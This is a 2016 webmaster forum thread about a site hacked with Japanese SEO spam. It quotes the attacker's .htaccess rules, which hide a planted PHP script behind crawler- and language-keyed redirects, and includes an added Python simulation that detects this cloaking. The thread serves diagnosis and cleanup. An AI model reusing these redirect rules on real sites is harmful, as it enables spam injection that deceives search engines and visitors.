
Is this a sign of Hacking

Host and GWT indicates the site is not hacked


Lorel

5:04 pm on Sep 15, 2016 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I have a site that is showing Japanese characters for all text when the site comes up in a Google search. Yet I can go directly to the site using the domain name and the site looks fine and I can see no excess code on the home page. The hosting company can find no evidence of hacking and no warning in GWT/Search Console. I requested Google to fetch the page and index it and the Japanese characters are still showing up. I also changed the password.

However the htaccess file has code that I don't recognize (the site hasn't been worked on for over a year). All the new code is for WordPress but the owner has never used WordPress even though I can see it installed. It has one line for the Japanese language so I suspect this is the problem.

Can someone tell me if I remove this section in htaccess (see below) and remove the blog off the server if this will take care of the hacking problem? Should I change the password again once I do this?

RewriteRule ^google(.*)\.html$ /wordpress/wp-admin/network/tpl/wp-og3.php?gg=$1 [L]
RewriteCond %{HTTP_USER_AGENT} (bot|google|yahoo|aol|bing|crawl|aspseek|icio|robot|spider|nutch|slurp|msnbot) [NC]
RewriteCond %{REQUEST_FILENAME} !(wp-og3.php|xsl|css|jpg|gif|js)$ [NC]
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|seznam|Seznam) [NC]
RewriteCond %{HTTP:Accept-Language} ^ja.*$ [NC]
RewriteCond %{REQUEST_FILENAME} !(wp-og3.php|xsl|css|jpg|gif|js)$ [NC]
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
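To make the symptom in this post concrete (the site looks normal when you open it directly, but Google sees the Japanese doorway content), here is an added Python example; it is not code from the original post or from any of the posters. It copies the quoted rules into a string, groups each RewriteRule with the RewriteCond lines above it the way mod_rewrite does, and evaluates them against a few constructed requests (crawler, direct visitor, Japanese visitor arriving from a search engine). The request headers, the simplified rewrite model and the `flag_cloaking` heuristic are my assumptions, not something the server or the poster provides.

```python
import re

# Constructed copy of the .htaccess fragment quoted in the post above.
HTACCESS = r"""
RewriteRule ^google(.*)\.html$ /wordpress/wp-admin/network/tpl/wp-og3.php?gg=$1 [L]
RewriteCond %{HTTP_USER_AGENT} (bot|google|yahoo|aol|bing|crawl|aspseek|icio|robot|spider|nutch|slurp|msnbot) [NC]
RewriteCond %{REQUEST_FILENAME} !(wp-og3.php|xsl|css|jpg|gif|js)$ [NC]
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|seznam|Seznam) [NC]
RewriteCond %{HTTP:Accept-Language} ^ja.*$ [NC]
RewriteCond %{REQUEST_FILENAME} !(wp-og3.php|xsl|css|jpg|gif|js)$ [NC]
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
"""

CHROME_UA = "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0 Safari/537.36"
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Constructed sample requests (hypothetical headers, not taken from the site).
SAMPLE_REQUESTS = {
    "googlebot_home": {"path": "/index.html", "user_agent": GOOGLEBOT_UA},
    "googlebot_css": {"path": "/style.css", "user_agent": GOOGLEBOT_UA},
    "direct_visitor": {"path": "/index.html", "user_agent": CHROME_UA,
                       "accept_language": "en-US,en;q=0.8"},
    "japanese_searcher": {"path": "/index.html", "user_agent": CHROME_UA,
                          "referer": "https://www.google.co.jp/search?q=example",
                          "accept_language": "ja,en;q=0.8"},
    "doorway_page": {"path": "/google-abc.html", "user_agent": CHROME_UA},
}

# Server variables that describe the client rather than the resource.
CLIENT_VARS = {"%{HTTP_USER_AGENT}", "%{HTTP_REFERER}", "%{HTTP:Accept-Language}"}


def parse_rules(text):
    """Group every RewriteRule with the RewriteCond lines directly above it
    (in Apache a RewriteCond applies only to the next RewriteRule)."""
    rules, conds = [], []
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        flags = parts[3].strip("[]").split(",") if len(parts) > 3 else []
        if parts[0] == "RewriteCond":
            conds.append({"var": parts[1], "pattern": parts[2], "nc": "NC" in flags})
        elif parts[0] == "RewriteRule":
            rules.append({"conds": conds, "pattern": parts[1],
                          "target": parts[2], "last": "L" in flags})
            conds = []
    return rules


def _variable(var, req):
    # Only the variables used in the quoted rules are modelled (assumption).
    return {
        "%{HTTP_USER_AGENT}": req.get("user_agent", ""),
        "%{HTTP_REFERER}": req.get("referer", ""),
        "%{HTTP:Accept-Language}": req.get("accept_language", ""),
        "%{REQUEST_FILENAME}": req["path"],
    }[var]


def _cond_matches(cond, req):
    pattern, negate = cond["pattern"], False
    if pattern.startswith("!"):          # leading '!' negates the condition
        pattern, negate = pattern[1:], True
    flags = re.IGNORECASE if cond["nc"] else 0
    hit = re.search(pattern, _variable(cond["var"], req), flags) is not None
    return hit != negate


def route(req, rules):
    """Return the path the server would serve for this request. Per-directory
    (.htaccess) context: the leading slash is stripped before matching."""
    path = req["path"].lstrip("/")
    for rule in rules:
        if not all(_cond_matches(c, req) for c in rule["conds"]):
            continue
        m = re.search(rule["pattern"], path)
        if not m:
            continue
        # Expand $1.. backreferences from the rule pattern into the target.
        target = re.sub(r"\$(\d)", lambda s: m.group(int(s.group(1))) or "", rule["target"])
        if rule["last"]:                 # [L]: stop processing further rules
            return target
        path = target.lstrip("/")
    return "/" + path


def flag_cloaking(rules):
    """Heuristic: rules that hand some clients a script based on who is asking
    (crawler UA, search-engine referer, visitor language) while everyone else
    gets the real file. Returns (variables, target) pairs."""
    hits = []
    for rule in rules:
        keyed = {c["var"] for c in rule["conds"]} & CLIENT_VARS
        if keyed and rule["target"].split("?")[0].endswith(".php"):
            hits.append((sorted(keyed), rule["target"]))
    return hits


if __name__ == "__main__":
    parsed = parse_rules(HTACCESS)
    for name, req in SAMPLE_REQUESTS.items():
        print(f"{name:18} -> {route(req, parsed)}")
    for variables, target in flag_cloaking(parsed):
        print("client-keyed rule", variables, "->", target)
```

Run as-is, it shows the crawler and the Japanese searcher both landing on wp-og3.php while the direct visitor gets index.html, which is exactly why the host's direct check and Search Console look clean. The heuristic in `flag_cloaking` is the check worth keeping: a RewriteCond on the user agent, referer or Accept-Language that routes to a PHP file is rarely legitimate in a static site's .htaccess, so it is a good thing to grep a known-good backup against.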

not2easy

7:24 pm on Sep 15, 2016 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



If the .htaccess file at the root directory is different from an older copy you (or the owner) have, I would be concerned about that server and consider finding a better host. Especially if this is a shared server, it might have been compromised to allow changes to the .htaccess file (and other files). If the server itself has been compromised, any new password may be available to the party that made the change in the first place. Can you see the date/timestamp for the htaccess file?

If there is a blog and htaccess changes not made by the site owner or without their knowledge, I would certainly want it uninstalled and the related lines removed from the .htaccess file as a start. Be sure there is not a related database left on the server. Much depends on what you find that shouldn't be there, and the dates of changes, as to whether it is a poorly configured hosting setup or a compromised server. Has the host been contacted, are they aware of the situation?

lucy24

8:51 pm on Sep 15, 2016 (gmt 0)




However the htaccess file has code that I don't recognize (the site hasn't been worked on for over a year). All the new code is for Wordpress but the owner has never used Wordpress even though I can see it installed. It has one line for the japanese language so I suspect this is the problem.

Please tell me your first response was to change the site passwords.

RewriteCond {various stuff}
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
This is a nonsense rule anyway. What's the capture for, if it isn't going to be used in the redirect? Presumably the php file includes something that looks at FILENAME or REQUEST_URI -- whatever it's called in php -- so there's no need to include it in the URL.

:: irritably thinking that if the rule itself had been properly worded, there would be no need for all that css|js|etcetera stuff in the final condition, which should in any case have been the first condition, not that it's necessary to tell hackers how to improve their work ::

Lorel

10:04 pm on Sep 15, 2016 (gmt 0)




Instead of waiting for a reply I called the host again and he said go ahead and remove the code from the htaccess file and delete WP. It kept replicating itself so I had to get the host to finish it. And then I changed the password again. Then requested Google re-index the site again and the Google results are already recuperating an hour later.

This was apparently caused by the owner having someone install WP 3.1 a year ago without telling me and never finishing it, so it was never updated (it wasn't even listed in site manager as being installed, which was odd). It looks like this was the avenue of access to the site. Plus the site is on an old server that needs to be updated. Not the host's fault. The owner has just let the site sit idle. There is no database.

Thanks for your help everyone.

topr8

10:16 pm on Sep 15, 2016 (gmt 0)




>>Plus the site is on an old server that needs to be updated. Not the hosts fault.

Is this a dedicated server run by the client? If not, how is this NOT the host's fault?

martinibuster

2:07 am on Sep 16, 2016 (gmt 0)




how is this NOT the host's fault.

topr8 is right, you are not out of the woods. Your client is still in danger. While the htaccess file was directly related to the old WordPress installation, version 3.1, confirming that the entry point was WordPress and not the unpatched server (we're currently into WordPress version 4.6.1), the server itself may still present a critical problem.

As topr8 implies, your client's problem is not entirely solved. It is critical to get the server software patched up asap because your client's site is sitting on a time bomb.

not2easy

3:01 am on Sep 16, 2016 (gmt 0)




it kept replicating itself

Be sure to remove the SQL file that WP creates on install or it can continue to reappear. If the site owner has no databases, there should be none in the account. If the site uses CP, check the software installation tools there and phpMyAdmin.

engine

8:33 am on Sep 16, 2016 (gmt 0)




On top of what's been mentioned, there are a couple of resources out there that might also help you.

Google's Safe Browsing Site Status [google.com...]

Sucuri has an online scanner for one-off scans that's free to use, with a more comprehensive paid version.
[sitecheck.sucuri.net...]

And, as has been said, it's important to keep the plugins and software updated. The owner leaving it for a long while without that attention is asking for problems, IMHO.

Lorel

5:36 pm on Sep 16, 2016 (gmt 0)




The site is not on a dedicated server. There is no database. I told the client he needs to upgrade to a new server. I removed all of WP. The site indexing is still improving in Google search. I'll keep watching it to make sure it doesn't reinfect the site.

Thanks for the info everyone.

Lorel

5:37 pm on Sep 16, 2016 (gmt 0)




PS. This site was never declared unsafe by Google.